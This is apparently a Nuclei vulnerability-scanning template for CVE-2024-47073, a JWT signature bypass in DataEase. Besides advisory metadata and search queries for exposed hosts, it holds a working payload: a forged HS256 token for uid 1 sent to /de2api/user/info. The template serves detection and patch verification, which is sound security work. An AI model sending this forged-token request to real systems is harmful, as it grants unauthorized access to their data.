id: CVE-2024-47073

info:
  name: DataEase v2.10.2 - JWT Signature Verification Bypass
  author: iamnoooob,pdresearch
  severity: critical
  description: |
    DataEase is an open source data visualization analysis tool that helps users quickly analyze data and gain insights into business trends. In affected versions, the lack of signature verification of JWT tokens allows attackers to forge JWTs, which then allow access to any interface. The vulnerability has been fixed in v2.10.2 and all users are advised to upgrade. There are no known workarounds for this vulnerability.
  impact: |
    Attackers can forge JWT tokens to bypass authentication and gain unauthorized access to any interface.
  remediation: |
    Update DataEase to version 2.10.2 or later.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2024-47073
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
    cvss-score: 9.1
    cve-id: CVE-2024-47073
    cwe-id: CWE-347
    epss-score: 0.56105
    epss-percentile: 0.98141
    cpe: cpe:2.3:a:dataease:dataease:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    vendor: dataease
    product: dataease
    shodan-query: http.html:"dataease"
    fofa-query: body="dataease"
  tags: cve,cve2024,dataease,jwt,vuln

variables:
  payload: '{"uid":1,"oid":1,"exp":{{unix_time(1000)}}}'
  token: '{{generate_jwt(payload,"HS256","random") }}'

http:
  - raw:
      - |
        GET /de2api/user/info HTTP/1.1
        Host: {{Hostname}}
        X-DE-TOKEN: {{token}}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - data
          - '"oid":"1"'
          - code
        condition: and

      - type: status
        status:
          - 200
# digest: 4a0a00473045022052f27e1d6b5f419c7418ee6931af5857c9f12975980ffae1dfdde9c56d8738e4022100b1ece063cd83708a3e5a9485f72126c8641592bd7a8760b1b9736cc715e8859b:922c64590222798bb761d5b6d8e72950